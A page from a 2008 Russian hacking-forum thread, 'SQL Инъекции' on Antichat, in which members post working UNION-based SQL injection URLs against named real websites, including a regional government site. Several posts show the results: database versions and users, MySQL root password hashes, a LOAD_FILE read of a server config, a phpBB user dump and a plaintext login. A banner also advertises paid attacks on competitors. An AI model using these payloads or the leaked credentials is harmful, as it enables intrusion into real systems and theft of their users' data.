Форум АНТИЧАТ - SQL Инъекции

ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 551 из 1239

551

Опции темы

Поиск в этой теме

Опции просмотра

03.06.2008, 21:53

$p01nt

Участник форума

Регистрация: 19.02.2008

Сообщений: 186

Провел на форуме:
584540

Репутация: 96

www.bisart.ru --- в антибояне нет

http://www.bisart.ru/auto/index.php?sid=54+union+select+1,version(),3,4,5,6, 7/*

4.0.27-log
db11539m
m11539@he.hoster.ru

ЗЫ. первый найденный мной скуль иньект

правда с 4ой базой я еще не работал ...

03.06.2008, 21:58

~~IIAHbI4~~

Banned

Регистрация: 24.08.2006

Сообщений: 483

Провел на форуме:
3895065

Репутация: 1112

Отправить сообщение для IIAHbI4 с помощью ICQ

http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71)%23

Цитата:

Database Version: 5.0.18-standard-log
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com

03.06.2008, 22:18

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Цитата:

Сообщение от IIAHbI4

фигасе закрутил.

http://www.rakurs.rovno.ua/info.php?id=-4740+union+select+от, одного,до,шести,database(),кагбе восемь,9,version(),user(),12,13,14/*

database() - rakursr_db
version() - 5.0.45
user() - rakursr_user@localhost

__________________

BlackHat.

MoDL

04.06.2008, 00:27

~~IIAHbI4~~

Banned

Регистрация: 24.08.2006

Сообщений: 483

Провел на форуме:
3895065

Репутация: 1112

Цитата:

Сообщение от ChaaK

Эммм тулза sql-inj tool конечшно полезная.
но прежде чем выкладывать проверяй в браузере.

Не проще ли пере писать в нормальном виде по количеству столбцов?

ты наркоман? этого
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com

не достаточно ?

04.06.2008, 11:31

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Правительство Амурской области
http://www.amurobl.ru/index.php?m=&r=3&c=-1/**/union/**/select/**/0,1,2,3,version(),5,6/*

04.06.2008, 15:40

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

Ну вот и расшифровался в базе хешик

Цитата:

root:*313D4F6D366ADB0901FFDDA18A2A5D156C99BD1F:rel ixrelix

выкладывал до этого, но раз не полностью раскрученно было- убрал, теперь все ок =)
давайте погуглим: answer.php?rub=
Да, вот и пожалуйста:
и так:
http://******.zao.mos.ru/answer.php?rub=
-1+union+select+LOAD_FILE('/usr/local/apache/httpd.conf'),2,3,4,5,6,7/*
-1+union+select+concat(user,0x3a,password),2,3,4,5, 6,7+from+mysql.user/*
file_priv=Y
а что дальше? а вот что.Что в столице денег нет что ли на нормальный не бажный сайт? Не верю. для zao.mos.ru на Битрикс бабла хватило

Последний раз редактировалось xcedz; 04.06.2008 в 18:21..

04.06.2008, 22:05

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

http://www.weed.ru/pphlogger/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,vers ion(),null,null,null,null,null,null,null,null,null ,null,null,null,
null,null,null,null,null,null,null,null,null%20fro m%20pphl_users%20limit%200,1&action=edit

PS: auth:
имя: blacksun
пароль: B1kC9i4P

05.06.2008, 00:40

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

sql иньекциях не силен по этому и хочу разобраться чё к чему

www.rayner.com

Поехали)
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysq l.user/*
5.0.32-Debian_7etch1-log

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.use r/*
Даёт user их 5.

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql .user/*
а по такому запросу пишет как я по нимаю пароли в зашифровки mb5.

*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
*8050739003BBDB60551FA99B5FFF34957C4F5F49

Тек ли это и стоит ли тратить време на их расшифровку???

05.06.2008, 01:29

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

Провел на форуме:
404154

Репутация: 140

Отправить сообщение для Shram-spb с помощью ICQ

Код:

http://zoorinok.com.ua/zoo_details.php?id=-9061+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws(char(58),username,user_password,user_icq,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users/*

www.pilot-film.com

#10

05.06.2008, 01:46

XiD

Новичок

Регистрация: 02.06.2008

Сообщений: 28

Провел на форуме:
245927

Репутация: 55

Отправить сообщение для XiD с помощью ICQ

www.pilot-film.com

http://www.pilot-film.com/index.php?p=show_person&pid=-2+union+select+1,2,3,4,5,6,7,8,9,10/*

Страница 551 из 1239

551

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ